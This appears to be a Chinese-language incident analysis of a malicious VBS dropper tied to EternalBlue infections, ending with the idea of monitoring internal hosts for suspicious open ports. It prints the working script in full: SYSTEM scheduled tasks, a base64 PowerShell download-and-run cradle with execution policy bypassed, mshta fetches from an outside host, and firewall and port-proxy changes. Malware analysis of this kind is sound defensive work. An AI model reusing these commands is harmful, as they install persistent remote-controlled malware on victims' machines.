tmp.vbs是内容如下:
Set ws = CreateObject("WScript.Shell") ws.Run "cmd.exe /c echo BoYzlCN >> c:\windows\temp\svchost.exe&echo ""*"" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53© /y c:\windows\temp\svchost.exe c:\windows\nGYN.exe&move /y c:\windows\temp\dig.exe c:\windows\MdakZaGM.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn ""\Microsoft\windows\Bluetool"" /tr ""powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn nGYN /tr ""C:\Windows\nGYN.exe"" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn ""\wKGEloX"" /tr ""c:\windows\MdakZaGM.exe"" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr ""cmd.exe /c mshta w.beahh.com/page.html?p… /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr ""c:\windows\MdakZaGM.exe""&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr ""c:\windows\nGYN.exe""&schtasks /run /TN escan)",0 Set ws = CreateObject("WScript.Shell") ws.Run "c:\windows\temp\setup-install.exe",0
其实里面涉及到很多的中间过程的文件。
echo BoYzlCN >> c:\windows\temp\svchost.exe
echo "*" >c:\windows\temp\hash.txt
netsh firewall add portopening tcp 65533 DNSd
netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
copy /y c:\windows\temp\svchost.exe c:\windows\nGYN.exe
move /y c:\windows\temp\dig.exe c:\windows\MdakZaGM.exe
ws.Run "c:\windows\temp\setup-install.exe",0
如下是创建计划任务的环节,已经做了很好的划分了
if exist C:/windows/system32/WindowsPowerShell/ (
schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn nGYN /tr "C:\Windows\nGYN.exe" /F
schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\wKGEloX" /tr "c:\windows\MdakZaGM.exe" /F
) else (
start /b sc start Schedule
ping localhost
sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f
schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?p%COMPUTERNAME%"
schtasks /run /TN Autocheck
start /b sc start Schedule
ping localhost
sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f
schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\MdakZaGM.exe"
schtasks /run /TN Autostart
start /b sc start Schedule
ping localhost
sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f
schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\nGYN.exe"
schtasks /run /TN escan
)
每 50 分钟运行一次 PowerShell 脚本,绕过执行策略 (-ep bypass),并执行一段 Base64 编码的命令。
每 10 分钟运行一次 C:\Windows\nGYN.exe。
每 10 分钟运行一次 c:\windows\MdakZaGM.exe。
我去搜了一下,从65529-65533,49152-49158,49664-49670,的端口都是永恒之蓝木马会尝试开启的端口。
所以思路就是监控一下内网是否有开放这些端口的windows服务器,如果有,大概率是中毒了或者是曾经中毒了。
